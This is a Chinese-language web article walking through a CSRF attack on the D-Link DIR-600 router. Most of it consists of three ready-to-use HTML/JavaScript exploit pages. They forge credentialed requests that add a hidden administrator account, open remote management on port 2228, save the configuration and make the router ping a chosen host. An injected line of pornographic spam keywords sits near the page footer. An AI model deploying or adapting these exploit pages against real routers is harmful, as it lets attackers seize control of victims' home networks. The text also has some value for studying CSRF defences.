使用CSRF漏洞攻擊D-link路由器全過程

發(fā)布時間：2014-04-25 13:34:19 作者：佚名

本文介紹了使用CSRF漏洞攻擊D-link路由器全過程,主要目的是如何通過CSRF漏洞實現(xiàn)遠(yuǎn)程管理訪問D-link路由器,需要的朋友可以參考下

1，介紹

本文的目的是展示CSRF漏洞的危害，以D-link的DIR-600路由器（硬件版本：BX，固件版本：2.16）的CSRF漏洞為例。
D-link的CSRF漏洞已經(jīng)是公開的，本文將詳細(xì)描述一下整個D-link CSRF漏洞的利用，如何通過CSRF漏洞實現(xiàn)遠(yuǎn)程管理訪問D-link路由器。

2，CSRF漏洞說明

如果某些request請求中沒有csrf token或不需要密碼授權(quán)，會存在CSRF漏洞，該漏洞允許攻擊者偽造登錄用戶發(fā)送請求，因此可以導(dǎo)致用戶執(zhí)行攻擊者想要的操作請求。
通過D-link 管理面板的CSRF漏洞，攻擊者可以做以下操作：

@1，添加一個新的管理帳號；
@2，啟用路由器的遠(yuǎn)程管理；
@3，ping特定的機(jī)器；此操作只需要登錄路由器就可以實現(xiàn)，需要知道路由器的WAN IP地址。

3，PART1:給路由器增加一個新的管理帳號

需要兩個request請求來完成

REQUEST1:

復(fù)制代碼

代碼如下:

<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://192.168.0.1/hedwig.cgi", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "text/plain; charset=UTF-8");
xhr.withCredentials = "true";
var body = "<?xml version=\"1.0\" encoding=\"UTF-8\" ?>"+
"
<postxml>"+
"<module>"+
"<service>DEVICE.ACCOUNT</service>"+
"<device>"+
"<account>"+
"<seqno/>"+
"<max>1</max>"+
"<count>2</count>"+
"<entry>"+
"<name>admin</name>"+
"
<password>==OoXxGgYy==</password>"+
"<group>0</group>"+
"<description/>"+
"</entry>"+
"<entry>"+
"<name>admin2</name>"+
"
<password>pass2</password>"+
"<group>0</group>"+
"<description/>"+
"</entry>"+
"</account>"+
"<session>"+
"<captcha>0</captcha>"+
"<dummy/>"+
"<timeout>180</timeout>"+
"<maxsession>128</maxsession>"+
"<maxauthorized>16</maxauthorized>"+
"</session>"+
"</device>"+
"</module>"+
"<module>"+
"<service>HTTP.WAN-1</service>"+
"<inf>"+
"<web>2228</web>"+
"<weballow>"+
"<hostv4ip/>"+
"</weballow>"+
"</inf>"+
"</module>"+
"<module>"+
"<service>HTTP.WAN-2</service>"+
"<inf>"+
"<web>2228</web>"+
"<weballow>"+
"<hostv4ip/>"+
"</weballow>"+
"</inf>"+
"</module>"+
"</postxml>";
xhr.send(body);
}
</script>
<form action="#">
<input type="button" value="Submit request1" onclick="submitRequest();" />
</form>
</body>
</html>

REQUEST2:

復(fù)制代碼

代碼如下:

<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://192.168.0.1/pigwidgeon.cgi", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
xhr.withCredentials = "true";
var body = "ACTIONS=SETCFG%2CSAVE%2CACTIVATE";
xhr.send(body);
}
</script>
<form action="#">
<input type="button" value="Submit request2" onclick="submitRequest();" />
</form>
</body>
</html>

REQUEST1和REQUEST2中，默認(rèn)的路由局域網(wǎng)IP地址是192.198.0.1,管理帳號是admin,REQUEST1中的request請求中，當(dāng)密碼字段為==OoXxGgYy==的時候，是不會修改admin帳號的密碼的。這兩個請求完成了管理帳號admin2的添加，同時啟用了遠(yuǎn)程管理端口2228.

PART2：ping特定的主機(jī)

REQUEST3:

復(fù)制代碼

代碼如下:

<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://192.168.0.1/diagnostic.php", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
xhr.withCredentials = "true";
var body = "act=ping&dst=X.Y.Z.W";
xhr.send(body);
}
</script>
<form action="#">
<input type="button" value="Submit request3" onclick="submitRequest();" />
</form>
</body>
</html>

只需要求該代碼中的X.Y.Z.W為你需要ping的主機(jī)IP地址就可以。

Tag：CSRF漏洞 D-Link 路由器

欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

使用CSRF漏洞攻擊D-link路由器全過程

相關(guān)文章

最新評論

文章分類

大家感興趣的內(nèi)容

最近更新的內(nèi)容